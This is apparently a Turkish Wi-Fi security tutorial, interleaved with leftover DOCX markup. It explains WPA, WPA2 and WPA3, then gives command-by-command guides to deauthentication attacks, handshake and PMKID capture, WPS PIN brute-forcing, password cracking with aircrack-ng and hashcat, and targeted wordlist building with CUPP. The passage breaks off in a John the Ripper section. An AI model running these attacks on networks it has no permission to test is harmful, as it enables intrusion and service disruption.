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mllu87t2lv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🔐 WPA (Wi-Fi Protected Access) Nasıl Çalışır?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WPA (Wi-Fi Protected Access) kablosuz ağları korumak için geliştirilmiş bir güvenlik protokolüdür. WEP'in zayıflıklarını gidermek amacıyla geliştirilmiş ve daha güçlü şifreleme kullanarak kablosuz ağ güvenliğini artırmıştır.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hhtdurjmo4a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1️⃣ WPA'nın Temel Çalışma Mantığı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Dinamik Şifreleme Anahtarları Kullanır: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WEP’ten farklı olarak, her pakette farklı bir şifreleme anahtarı kullanılır.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Bu, her paketin farklı şifrelenmesini sağlayarak saldırıları zorlaştırır.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🔹 Kimlik Doğrulama (Authentication) Kullanır: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WPA, kullanıcının ağa bağlanmadan önce kimlik doğrulama yapmasını gerektirir.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🔹 Gelişmiş Şifreleme Kullanır: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WEP'in zayıf RC4 algoritmasını kullanan WPA, TKIP (Temporal Key Integrity Protocol) ile ek güvenlik sağlar.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WPA2 ve WPA3, AES (Advanced Encryption Standard) kullanarak güvenliği daha da artırır.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g4kddf7rh5q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📌 2️⃣ WPA Türleri ve Çalışma Şekilleri</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="9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5"/>
        <w:gridCol w:w="4430"/>
        <w:gridCol w:w="3050"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1835"/>
            <w:gridCol w:w="4430"/>
            <w:gridCol w:w="30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 Türü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Şifreleme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Güvenlik Seviyesi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 (İlk Versiyon)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TKIP + RC4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Orta (WEP’ten daha iyi ama kırılabilir)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AES-CCMP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Yüksek (Günümüzde yaygın)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Simultaneous Authentication of Equals (SAE) + AES-GCMP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Çok Yüksek (En güvenlisi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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hryl9kpdd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i28b6cp2m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d1gvv6dkrf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l4snr7sldj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eef6eruhtt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1️⃣ WPA (İlk Versiyon) Nasıl Çalışır?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İlk WPA sürümü 2003 yılında tanıtıldı ve WEP’ten daha güvenliydi, ancak hâlâ bazı zayıflıkları vardı.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Özellikleri:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ TKIP (Temporal Key Integrity Protocol) Kullanır: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Her paket için farklı bir şifreleme anahtarı kullanır.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WEP gibi statik anahtarlar yerine dinamik anahtarlar ile şifreleme sağlar.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ MIC (Message Integrity Check) Kullanır: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Verilerin değiştirilip değiştirilmediğini kontrol eder.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🚨 Ancak RC4 şifreleme algoritmasını kullandığı için zamanla kırılabilir hale gelmiştir.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lbunr4t3v94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2️⃣ WPA2 Nasıl Çalışır? (En Yaygın Kullanılan)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Özellikleri:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ AES (Advanced Encryption Standard) Kullanır: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WPA2, AES-CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) kullanır.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Bu, askeri düzeyde şifreleme sağlar ve kırılması çok daha zordur.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Güçlü Kimlik Doğrulama Kullanır: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802.1X ve EAP (Extensible Authentication Protocol) ile daha güvenli bir kimlik doğrulama mekanizması vardır.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🚨 Ancak WPA2 de brute-force saldırılarına karşı savunmasız olabilir.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160tfvat5o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3️⃣ WPA3 Nasıl Çalışır? (En Güvenli WPA Versiyonu)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Özellikleri:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ SAE (Simultaneous Authentication of Equals) Kullanır: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"Dragonfly Handshake" olarak bilinen yeni bir yöntemle, her oturum için farklı bir anahtar oluşturur.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WPA2’de olduğu gibi Handshake saldırılarına karşı daha dayanıklıdır.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Brute-Force Saldırılarına Dayanıklı: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WPA2’deki offline parola tahmin saldırılarını engeller.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Forward Secrecy Sağlar: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Önceki şifreleme anahtarları sızdırılsa bile, yeni oturumlar etkilenmez.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🚨 Ancak, WPA3 desteklemeyen eski cihazlarla uyumsuz olabilir.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874jprdrmm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otyu5n25j9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17ucgr12em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wjs2bb7cm4p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📌 3️⃣ WPA Şifreleme ve Kimlik Doğrulama Mekanizması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WPA ile kablosuz ağlara bağlanırken iki ana yöntem kullanılır:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="6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0"/>
        <w:gridCol w:w="3500"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3260"/>
            <w:gridCol w:w="35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 Bağlantı Türü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Kullanım Alanı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WPA-Personal (WPA-PSK)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 ağları ve küçük işletmeler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WPA-Enterprise (WPA-EAP)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Büyük şirketler ve kurumsal ağlar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Bağlantı süreçleri:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">1️⃣ Cihaz, Wi-Fi şifresini kullanarak ağa bağlanmaya çalışır.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2️⃣ Router, cihazın kimlik doğrulamasını yapar ve "4-way handshake" başlatır.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">3️⃣ Ağ, cihaz ve router arasında dinamik olarak oluşturulan şifreleme anahtarları kullanılır.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">4️⃣ Veriler güvenli bir şekilde şifrelenerek iletilir.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jsfnztvel9r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📌 4️⃣ WPA'nın Güvenlik Açıkları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🚨 WPA-PSK (Wi-Fi Şifresi) Kırılabilir mi?</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Evet, eğer zayıf bir parola kullanılmışsa!</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🔹 WPA şifresini kırmak için brute-force (kaba kuvvet) saldırıları ve dictionary attack (sözlük saldırıları) kullanılabilir.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🔹 Eğer bir saldırgan WPA handshake paketlerini yakalarsa, bunları Hashcat veya Aircrack-ng ile kırmaya çalışabilir.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Örneğin, WPA handshake yakalamak için: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airodump-ng -c [Kanal] --bssid [Ağ MAC] -w dump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Yakalanan handshake ile brute-force saldırısı yapmak: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aircrack-ng -b [Ağ MAC] -w [Wordlist] dump.cap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🚨 WPA3, brute-force saldırılarına karşı çok daha güçlüdür ve offline saldırıları engeller.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s1zwn6geb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k35hjfviqy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yb1c77b98h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📌 5️⃣ WPA Güvenliği İçin En İyi Uygulamalar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✅ Güçlü Bir WPA2/WPA3 Parolası Kullanın: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Uzun (en az 16 karakter) ve karmaşık bir parola seçin.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ WPA3 Destekleyen Cihazlar Kullanın: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Eski WPA2 cihazlarını güncelleyin veya değiştirin.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ MAC Filtreleme Kullanın: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Sadece belirli MAC adreslerinin bağlanmasına izin verin.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Router Güncellemelerini ve Güvenlik Yamalarını Uygulayın.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Ağınızı Düzenli Olarak İzleyin ve Şüpheli Cihazları Engelleyin.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drd2sf4d6mt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📌 6️⃣ SONUÇ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✅ WPA, kablosuz ağları korumak için geliştirilmiş bir güvenlik protokolüdür.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ WPA2, AES-CCMP şifreleme ile hala en yaygın kullanılan protokoldür.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ WPA3, brute-force saldırılarına karşı en dayanıklı seçenektir.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Eski WPA sürümleri ve zayıf şifreler saldırılara karşı savunmasız olabilir.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________________________________________________________________________________________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n53bplwuzay" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 WPA/WPA2 Handshake Yakalama Rehberi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Handshake yakalama, bir kablosuz ağın WPA/WPA2 şifreleme anahtarını ele geçirmek için kullanılan bir tekniktir.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🔹 Amaç: Ağın kimlik doğrulama sürecini dinleyerek, "handshake" paketlerini yakalamak ve ardından parola kırma işlemi yapmaktır.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🔹 Araçlar: Kali Linux, Aircrack-ng, Wireshark, Hashcat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qk2j9m064q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📌 1️⃣ WPA/WPA2 Handshake Nedir?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📡 Kablosuz bir ağa bağlanırken, istemci (client) ile router (AP – Access Point) arasında bir kimlik doğrulama süreci gerçekleşir.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 süreç "4-Way Handshake" olarak adlandırılır:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">1️⃣ İstemci (Client) bağlanmaya çalışır.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2️⃣ Router, kimlik doğrulama için rastgele bir "challenge" (şifreleme anahtarı) gönderir.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">3️⃣ İstemci, şifreleme anahtarını doğrular ve cevap yollar.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">4️⃣ Router, bağlantıyı onaylar ve istemci artık ağa bağlıdır.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Handshake paketlerini ele geçirerek, ağın şifrelenmiş anahtarlarını elde edebiliriz.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">📌 Ancak, WPA/WPA2 şifresi kırmak için "wordlist" (şifre listesi) gereklidir.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oxy8df99x6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2pa0fvoa74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📌 2️⃣ Handshake Yakalama İçin Gerekli Araçlar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Gerekli Araçlar:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Kali Linux veya Parrot OS</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Monitor Mode Destekleyen Wi-Fi Adaptörü (Örneğin: Alfa AWUS036NHA)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Aircrack-ng Paketleri (airodump-ng, aireplay-ng, aircrack-ng)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Wireshark (İsteğe bağlı olarak paket analizi için)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Kendi ağınızı test ettiğinizden emin olun!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1xgsz7n7gr8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📌 3️⃣ Monitor Modunu Açma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📡 İlk olarak, Wi-Fi kartımızı "Monitor Mode"a alıyoruz.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1️⃣ Wi-Fi kartını listele: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iwconfig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Eğer "Mode: Managed" yazıyorsa, kart hala normal modda demektir.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Monitor modunu aç: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airmon-ng start wlan0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Bu işlem sonunda, kart "wlan0mon" olarak değişebilir.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3️⃣ Arka plandaki işlemleri durdur (gerekirse):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airmon-ng check kill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qemkzg1fytk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📌 4️⃣ Hedef Ağı ve Kanalı Belirleme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📡 Çevredeki Wi-Fi ağlarını tarayarak hedef ağın MAC adresini ve kanalını buluyoruz.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1️⃣ Ağları taramak için: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airodump-ng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Önemli Bilgiler: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BSSID: Router’ın benzersiz MAC adresi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CH: Kanal numarası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ESSID: Wi-Fi ağının ismi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Hedef ağı belirledikten sonra, kanal numarasını not alın.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2️⃣ Belirli bir ağa odaklan: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airodump-ng -c [KANAL] --bssid [BSSID] -w handshake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Örnek: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airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake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Bu komut, hedef ağı sadece belirtilen kanal üzerinden izler ve handshake paketlerini kaydeder.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lyk10xkmc4l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📌 5️⃣ Handshake Paketini Yakalamak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📡 Handshake'i yakalamak için istemcinin ağa bağlanmasını bekleyebiliriz ya da "Deauth Saldırısı" ile bağlantısını kopartıp yeniden bağlanmaya zorlayabiliriz.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1️⃣ Eğer bir istemci zaten bağlıysa, bekleyerek handshake yakalanabilir.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2️⃣ Eğer istemci bağlı değilse, "Deauthentication Attack" yaparak zorla bağlantıyı kesebiliriz.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Deauth Saldırısı Yapmak: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aireplay-ng -0 10 -a [BSSID] -c [İSTEMCİ_MAC]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Örnek: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aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon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Bu komut, belirlenen istemciyi 10 defa bağlantıdan düşürerek tekrar bağlanmasını sağlar.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">💡 Bağlantı tekrar sağlandığında, WPA handshake paketi kaydedilir.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afsm2n47h5o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📌 6️⃣ Handshake’in Yakalandığını Kontrol Etmek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📡 Handshake'in yakalanıp yakalanmadığını kontrol etmek için şu komutu kullanabilirsiniz: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ls -l handshake*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Eğer "handshake-01.cap" gibi bir dosya oluşturulduysa, işlem başarılıdır!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Ayrıca, Wireshark kullanarak ".cap" dosyasını açabilir ve "EAPOL" paketlerini kontrol edebilirsiniz.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z7hu1gjf558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📌 7️⃣ Handshake Kırma (Brute Force Saldırısı)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Yakalanan handshake paketini kullanarak WPA/WPA2 şifresini kırmaya çalışabiliriz.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1️⃣ Aircrack-ng ile Şifre Kırma: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aircrack-ng -w [WORDLIST] -b [BSSID] handshake-01.cap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Örnek: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aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap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Wordlist (şifre listesi) olarak "rockyou.txt" veya özel olarak hazırlanmış listeler kullanılabilir.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2️⃣ Hashcat ile Daha Güçlü Saldırı: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hashcat -m 22000 handshake-01.cap rockyou.txt --force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Hashcat, GPU kullanarak daha hızlı kırma işlemi yapabilir.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hvegyo17aa1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📌 8️⃣ WPA3 ve Güvenlik Önlemleri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WPA3 Handshake Yakalama ve Kırma Daha Zordur!</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ WPA3, SAE (Simultaneous Authentication of Equals) protokolü kullanır ve brute-force saldırılarını engeller.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Eski WPA2 cihazları, WPA3’e yükseltilmelidir.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Güçlü, uzun ve karmaşık Wi-Fi şifreleri kullanılmalıdır.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izazejxago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📌 9️⃣ Özet ve Sonuç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✅ Handshake Yakalama Aşamaları:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">1️⃣ Wi-Fi kartını "Monitor Mode"a al.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2️⃣ Hedef ağı belirle.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">3️⃣ İstemciyi ağdan düşürerek tekrar bağlanmasını sağla.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">4️⃣ Handshake paketlerini kaydet.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">5️⃣ Şifreyi kırmak için wordlist kullan.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nb5xnuvmro3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📌 1️⃣ WPA/WPA2 Handshake Yakalama ve Brute Force ile Şifre Kırma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📡 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Handshake Yakalama" yöntemi, WPA/WPA2 ağlarının parola doğrulama sürecini ele geçirerek çalışır.</w:t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8gt1mugcqy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1: Monitor Modunu Açma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Wi-Fi adaptörünü </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor Mode'a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> almak için: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airmon-ng start wlan0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Kart ismi "wlan0mon" olarak değişebilir.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f4943guh21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2: Ağları Taramak ve Hedef Seçmek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Çevredeki Wi-Fi ağlarını tarayın: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airodump-ng wlan0mon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Not almanız gerekenler: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BSSID:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Router’ın MAC adresi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CH:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kanal numarası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ESSID:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wi-Fi adı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4tzjlhmfgw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3: Handshake Yakalama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Belirli bir ağın handshake paketlerini yakalamak için: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airodump-ng -c [KANAL] --bssid [BSSID] -w handshake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Örnek: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airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake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Bağlantıyı zorlamak için "Deauth Saldırısı" yapabilirsiniz.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zrh9v1q9jk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obh2basbd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9glvrmv8fq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6jfs9rzyt0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4: Deauthentication Saldırısı (Bağlantıyı Kesmek)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📡 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir istemciyi düşürerek tekrar bağlanmasını sağlayabiliriz.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aireplay-ng -0 10 -a [BSSID] -c [İSTEMCİ_MAC]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Örnek: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aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon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Handshake başarıyla yakalandığında,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.cap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> dosyasında saklanır.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itwkz5art6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5: WPA Handshake Dosyasını Kırma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Aircrack-ng ile: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aircrack-ng -w wordlist.txt -b [BSSID] handshake-01.cap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Örnek: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aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap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Güçlü şifreler için büyük wordlist dosyaları gerekir.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Hashcat ile GPU kullanarak kırma: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hashcat -m 22000 handshake-01.cap rockyou.txt --force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Wordlist'in içinde şifre yoksa, saldırı başarısız olur.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bsjfmcyn9h3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📌 2️⃣ WPS PIN Zafiyeti ile Şifre Kırma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📡 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bazı modemlerde "WPS PIN" güvenlik açığı bulunur.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🛠 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Araç: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Reaver</w:t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lpz2i15t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1: Hedef Ağı Tespit Etme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wash -i wlan0mon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WPS etkin olan modemleri listeleyecektir.</w:t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0mjao4udj7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2: WPS PIN Saldırısı Başlatma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reaver -i wlan0mon -b [BSSID] -vv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Bu yöntem, WPS açık modemlerde şifreyi birkaç saat içinde kırabilir.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gz9omu2k8y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📌 3️⃣ PMKID Saldırısı (Handshake Yakalamadan Kırma)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📡 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu yöntem, WPA/WPA2 ağlarına bağlanmadan parola hash’ini ele geçirmek için kullanılır.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🛠 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Araç: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hcxdumptool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Hashcat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lukpwoblap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1: PMKID Paketini Yakalama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hcxdumptool -i wlan0mon --enable_status=1 -o pmkid.pcapng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4qd5yluyav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Adım 2: PMKID Hash’i Kırma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hashcat -m 16800 pmkid.pcapng rockyou.txt --force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Handshake yakalamadan WPA2 şifresi kırmanın en hızlı yollarından biridir.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345brl7o4yq" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">📌 WPA Şifreleme ve Güvenlik Önlemleri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Güçlü bir parola kullanın (12+ karakter, büyük/küçük harf, özel karakter ve rakam içermeli).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WPS özelliğini kapatın.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Modemin firmware’ini güncelleyin.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MAC adres filtresi uygulayın.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Gizli SSID kullanın.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tdmt4nevsx8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ha6b7tevhp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qsfnotyfl7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yrgvj80dalf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tcpr47hsa6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rro9gg9eks3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wfnocgmpf9t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📌 1️⃣ Hazır Wordlist Kaynakları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RockYou.txt: En popüler wordlistlerden biridir. Kali Linux içinde bulunur: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/usr/share/wordlists/rockyou.txt.gz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Çıkarmak için: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gunzip /usr/share/wordlists/rockyou.txt.gz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SecLists:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Büyük bir parola listesi koleksiyonudur. İndirmek için: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clone https://github.com/danielmiessler/SecLists.git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Weakpass:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Geniş bir şifre arşivi içerir.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Weakpass.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> üzerinden indirilebilir.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CrackStation:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Devasa bir şifre veritabanıdır.</w:t>
      </w:r>
      <w:hyperlink r:id="rId8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CrackStation.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> adresinden erişilebilir.</w:t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1qai1vcuqxx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📌 2️⃣ Özel Wordlist Oluşturma</w:t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cf0occnwbd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Crunch ile Wordlist Üretme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Crunch, belirli desenlerde şifreler oluşturabilir.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Örnek: 8-10 karakter uzunluğunda, harf ve rakam içeren wordlist oluşturma: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crunch 8 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt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Özel desenle oluşturma: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crunch 8 8 -t abc%%%%% -o pattern_list.txt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xro0gobrkt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CUPP (Common User Password Profiler)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CUPP, hedef kişinin bilgilerini kullanarak özel wordlist oluşturur.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Kurulum: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git clone https://github.com/Mebus/cupp.git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cd cupp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python3 cupp.py -i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Sorulan bilgileri doldurarak kişiye özel wordlist oluşturabilirsiniz.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mfk48rnjsz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Hashcat ile Wordlist Genişletme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Var olan bir wordlist'i varyasyonlar ekleyerek genişletme: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bash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hashcat --stdout wordlist.txt -r rules/best64.rule &gt; expanded_wordlist.txt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rules/best64.rule</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, Kali Linux içinde Hashcat'in kural setlerinden biridir.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3xua2wv9x7e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📌 3️⃣ Online Wordlist Üreticileri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🌐</w:t>
      </w:r>
      <w:hyperlink r:id="rId10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Weakpass Generator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Farklı kategorilerde şifre listeleri sağlar.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🌐 WPA-PSK Wordlist Generator → WPA2 şifreleri için özelleştirilmiş listeler oluşturur.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🌐</w:t>
      </w:r>
      <w:hyperlink r:id="rId12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Probable Wordlists</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Kullanıcı adı ve parola kombinasyonlarına dayalı listeler.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Özet:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Hazır listeler: RockYou, SecLists, CrackStation, Weakpass</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Özel oluşturma: Crunch, CUPP, Hashcat</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">✅ Online araçlar: Weakpass, WPA-PSK Generator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ofl6zvc8yyw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t6wv3iqfysb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g3txe39mxtp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74y5hlt0xb7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0pkniryrk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m3abw38e9g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xr9483opsls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John the Ripper (John) Nedir?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John the Ripper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (JtR), açık kaynaklı ve güçlü bir </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parola kırma</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> aracıdır. Özellikle sistem yöneticileri ve siber güvenlik uzmanları tarafından </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parola güvenliğini test etmek</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> için kullanılır.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96vhnqzamo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John the Ripper'ın Özellikleri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Farklı hash formatlarını destekler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Linux, Windows, macOS ve Unix sistemlerdeki </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">şifrelenmiş parolaları</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> analiz edebilir.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MD5, SHA-1, SHA-256, NTLM, Kerberos, MySQL, ZIP, RAR, PDF</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gibi birçok şifreleme türünü kırabilir.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Farklı saldırı yöntemleri kullanır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Sözlük saldırısı (Dictionary Attack)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Hazır kelime listeleri ile tahmin yapar.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Brute-force saldırısı</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
